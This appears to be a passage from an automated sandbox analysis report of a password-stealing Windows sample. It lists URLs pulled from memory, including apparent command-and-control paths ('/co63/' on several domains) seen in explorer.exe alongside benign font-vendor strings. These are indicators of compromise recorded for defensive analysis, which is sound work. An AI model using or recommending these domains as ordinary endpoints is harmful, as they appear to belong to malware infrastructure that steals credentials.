          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dlafluid.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dlafluid.com/co63/
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dlafluid.com/co63/www.myccsmartmove.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dlafluid.comReferer:
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dulichphucbinh.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dulichphucbinh.com/co63/
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dulichphucbinh.com/co63/www.f1-austin-tickets.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dulichphucbinh.comReferer:
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.f1-austin-tickets.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.f1-austin-tickets.com/co63/
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.f1-austin-tickets.com/co63/www.inf9obase.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.f1-austin-tickets.comReferer:
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395278067.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.402512238.0000000005753000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396031854.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395847311.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.402229452.0000000005755000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.397252243.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.401950666.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395360507.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396121393.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.402581080.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396894726.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394288066.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395903699.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395807046.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.397336290.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396640059.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396957387.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.401891749.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396853711.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395753968.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.397184658.0000000005757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394558568.000000000575A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers.
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394212105.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396031854.0000000005757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com6
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394715282.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396031854.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395847311.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396121393.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394558568.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395903699.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395807046.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396640059.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394791085.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394930632.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395753968.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394602661.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395704173.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396210983.0000000005757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comF
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396031854.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395847311.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395903699.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395807046.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395753968.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395704173.0000000005757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comTTF
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394715282.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394558568.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394288066.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395479456.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394791085.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394930632.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394602661.0000000005757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.coma
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396031854.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395847311.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396121393.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395903699.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395807046.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396640059.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395753968.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395704173.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396210983.0000000005757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comalsd~
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396121393.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396210983.0000000005757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comcom6
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395278067.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395023468.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395121921.0000000005757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comcoma
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394715282.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394558568.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394791085.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394930632.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394602661.0000000005757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comde
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395278067.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395526111.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394715282.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396031854.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395847311.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395411777.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395360507.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396121393.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395641687.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394343348.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394558568.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394288066.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395903699.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395479456.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395807046.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394466935.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396640059.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394791085.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394930632.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395753968.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394403535.0000000005757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comdia
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395278067.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394715282.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395411777.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395360507.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394558568.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394791085.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394930632.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394602661.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395023468.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395121921.0000000005757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comedet
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394212105.0000000005757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.coml
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395278067.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395526111.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396031854.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395847311.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395411777.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395360507.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396121393.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395641687.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395903699.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395479456.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395807046.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395753968.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395023468.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395704173.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395121921.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396210983.0000000005757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.commA
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.401891749.0000000005757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comrsiv
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395526111.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396031854.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395847311.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396121393.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395641687.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395903699.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395479456.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395807046.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395753968.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395704173.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396210983.0000000005757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comsivt
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394212105.0000000005757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comursiv
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
